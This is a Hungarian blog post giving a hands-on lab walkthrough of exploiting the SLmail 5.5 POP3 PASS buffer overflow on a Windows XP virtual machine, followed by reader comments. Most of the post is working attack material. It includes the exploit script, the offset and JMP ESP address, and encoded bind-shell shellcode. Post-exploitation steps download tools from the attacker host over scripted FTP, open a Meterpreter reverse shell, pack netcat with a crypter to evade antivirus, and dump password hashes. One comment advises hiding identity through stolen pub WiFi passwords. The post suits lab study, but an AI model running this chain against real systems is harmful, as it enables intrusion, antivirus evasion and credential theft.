2014. január 23., csütörtök

SLmail exploit


1st step: download this: http://www.offensive-security.com/pwbonline/extrabos.tar.gz
2nd step: install the SLmail application on the XP machine

netstat -naob

 Protokoll  Helyi cím              Idegen cím             Állapot           PID
  TCP    0.0.0.0:25             0.0.0.0:0              FIGYEL          1944
  [slsmtp.exe]

  TCP    0.0.0.0:79             0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:106            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:110            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

...

  TCP    0.0.0.0:180            0.0.0.0:0              FIGYEL          1840
  [SLadmin.exe]
...
  TCP    127.0.0.1:8376         0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]
...
  UDP    0.0.0.0:50             *:*                                    2376
  [SLmail.exe]

  UDP    0.0.0.0:54             *:*                                    2376
  [SLmail.exe]
...

root@kali:~# unicornscan -mT 192.168.56.105
TCP open                smtp[   25]        from 192.168.56.105  ttl 128
TCP open              finger[   79]        from 192.168.56.105  ttl 128
TCP open          3com-tsmux[  106]        from 192.168.56.105  ttl 128
TCP open                pop3[  110]        from 192.168.56.105  ttl 128
TCP open               epmap[  135]        from 192.168.56.105  ttl 128
TCP open         netbios-ssn[  139]        from 192.168.56.105  ttl 128
TCP open        microsoft-ds[  445]        from 192.168.56.105  ttl 128
TCP open             unknown[ 8081]        from 192.168.56.105  ttl 128

root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180

25/tcp  open  smtp    SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp  open  finger  SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open  pop3pw  SLMail pop3pw
110/tcp open  pop3    BVRP Software SLMAIL pop3d
180/tcp open  ris?

root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO    MAIL    RCPT    DATA    RSET
214-SEND    SOML    SAML    HELP    NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel

root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.

root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye

root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.

root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C

http://www.exploit-db.com/exploits/638/

root@kali:~# searchsploit slmail
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit                                /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit                       /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit                                 /windows/remote/646.c

root@kali:~# cat slmail_buf.py
import sys  # PoC crash reproducer for the SLmail POP3 PASS overflow; Python 2 (print statement). Usage: host port
import struct  # unused in this version
import socket
from time import sleep  # unused in this version

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A'*2000  # oversized PASS argument; the server does not bound its length, so the handler overruns what is presumably a fixed-size stack buffer (EIP reads 41414141 once this grows to 5000). The server-side fix is a length check before the copy.
s.connect((sys.argv[1],int(sys.argv[2])))  # argv[1] = host, argv[2] = port (110 in the transcript)
data=s.recv(1024)  # POP3 greeting banner
print data
s.send('USER user\r\n')  # any username is accepted at this stage (server replies "+OK user welcome here")
data=s.recv(1024)
print data
s.send('PASS '+buffer+'\r\n')  # the overflow happens while the server parses this PASS line
data=s.recv(1024)  # blocks here once the server has crashed (the KeyboardInterrupt in the transcript)
print data
s.close()

OllyDbg: attach to SLMAIL.exe
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>

+OK user welcome here

-ERR unable to lock mailbox

buffer = 'A'*5000

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>

+OK user welcome here

^CTraceback (most recent call last):
  File "slmail_buf.py", line 16, in <module>
    data=s.recv(1024)
KeyboardInterrupt

ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141

root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...

buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...

root@kali:~# python slmail_buf.py 192.168.56.105 110

ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658

OllyDbg: search for JMP ESP

7C91FCD8   FFE4             JMP ESP

root@kali:~# msfpayload  windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

buf =  ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>

+OK user welcome here

root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verziószám: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmailSystem>

Next step: bypass the AV and escalate privileges.

C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozzáférés megtagadva.

AV log:

2014.01.24.    09:46:38    Blocked by Access Protection rule     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\cmd.exe    C:\WINDOWS\system32\tftp.exe    Anti-virus Standard Protection:Prevent use of tftp.exe    Action blocked : Read

C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21

bin
GET nc.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajtóban (C) lévő kötet xp_system.
 A kötet sorozatszáma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  09:48    <DIR>          .
2014.01.24.  09:48    <DIR>          ..
2014.01.24.  09:47                56 ftp.txt
2002.11.19.  11:40             3 358 listrcrd.txt
2014.01.23.  09:24             1 898 maillog.000
2014.01.24.  00:00            51 104 maillog.001
2014.01.24.  09:33             6 141 maillog.txt
               5 fájl            62 557 bájt
               2 könyvtár  30 726 782 976 bájt szabad

C:\Program Files\SLmail\System>

AV log:

2014.01.24.    9:48:12    Deleted     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\ftp.exe    C:\Program Files\SLmail\System\nc.exe    Tool-NetCat (Potentially Unwanted Program)

Generate a payload16.exe with Veil.

C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21


bin
GET payload16.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajtóban (C) lévő kötet xp_system.
 A kötet sorozatszáma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  10:27    <DIR>          .
2014.01.24.  10:27    <DIR>          ..
2014.01.24.  10:27                63 ftp.txt
2002.11.19.  11:40             3 358 listrcrd.txt
2014.01.23.  09:24             1 898 maillog.000
2014.01.24.  00:00            51 104 maillog.001
2014.01.24.  10:03             6 309 maillog.txt
2014.01.24.  10:27         3 059 256 payload16.exe
               6 fájl         3 121 988 bájt
               2 könyvtár  30 723 756 032 bájt szabad

C:\Program Files\SLmail\System>

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...

C:\Program Files\SLmail\System>payload16.exe
payload16.exe

msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100

sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD  192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : xxxxx-30298B2AD
OS              : Windows XP (Build 2600, Szervizcsomag 3).
Architecture    : x86
System Language : hu_HU
Meterpreter     : x86/win32
meterpreter >

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session     User                                                                                                      Path
 ---   ----  ----                  ----  -------     ----                                                                                                      ----
 0     0     [System Process]            4294967295                                                                                                           
 4     0     System                x86   0           NT AUTHORITY\SYSTEM                                                                                      
 188   2012  explorer.exe          x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\WINDOWS\Explorer.EXE
 300   1600  cmd.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\WINDOWS\system32\cmd.exe
...

 532   848   FrameworkService.exe  x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\Common Framework\FrameworkService.exe
 580   848   VsTskMgr.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
 644   2476  McTray.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\Common Framework\McTray.exe
 712   644   shstat.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
 744   848   mdm.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
 752   580   mfeann.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
                                                                           C:\WINDOWS\system32\mfevtps.exe
 976   3676  payload16.exe         x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\payload16.exe
...

 1840  848   SLadmin.exe           x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLadmin\SLadmin.exe
 1944  848   SLSmtp.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\slsmtp.exe
...

 2100  300   nc.exe                x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\nc.exe
 2136  848   mcshield.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

meterpreter >

I encrypted nc.exe too:

root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe

Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

...

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

The AV is bypassed.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Segítségnyújtó:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vendég:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

Game OVER.

6 megjegyzés:

  1. Szia! Nagyon szuper blog!

    Privátban szeretnék tőled egy kis segítséget kérni C# programozásban. :-)

    email:jack-spaero[@]freemail.hu

  2. Ezzel vége a TOR-nak:

    http://pcforum.hu/hirek/15785/Megszerezte+az+FBI+az+osszes+a+Tor-on+keresztul+elkuldott+levelet.html

    http://pcforum.hu/hirek/15313/Konnyuszerrel+azonosithatok+a+Tor-t+hasznalo+internetezok.html

  3. 1. Ip cím elrejtésére a TOR mellett számos más lehetőség van.

    2. nyilvános Net kávézó vagy publikus WiFi , esetleg eldobható mobile stick + TOR és ... sok sikert a beazonosítási kísérletekhez...

    3. anomym email küldésre vannak más szolgáltatások amiket direkt erre hoztak létre...

    4. TOR-t általában azért használ valaki, hogy : a FORRÁS oldalon rejtse a forgalmat. A CÉL oldalon történő rejtőzéshez vannak ettől jobb módszerek.

    Magyarul a TOR arra való, hogy az ISP-d le lássa, hogy mit csinálsz milyen oldalakat látogatsz, stb. A private VPN-ek is erre valók. Ahhoz, hogy a cél oldalon ne lehessen lenyomozni a forrást, nem a TOR a legjobb, hanem az ellenőrizhetetlen forrás-ok alkalmazása (nyilvános wifi-k használata, kocsmák wifi jelszavának megszerzése, anonym proxy-kkal való kombinálása, satöbbi...)

  4. If you need your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (even if they're dating somebody else now) you need to watch this video
    right away...

    (VIDEO) Win your ex back with TEXT messages?

  5. I've used AVG anti virus for a couple of years now, and I recommend this anti virus to all you.

  6. BlueHost is ultimately the best web-hosting company for any hosting services you might need.
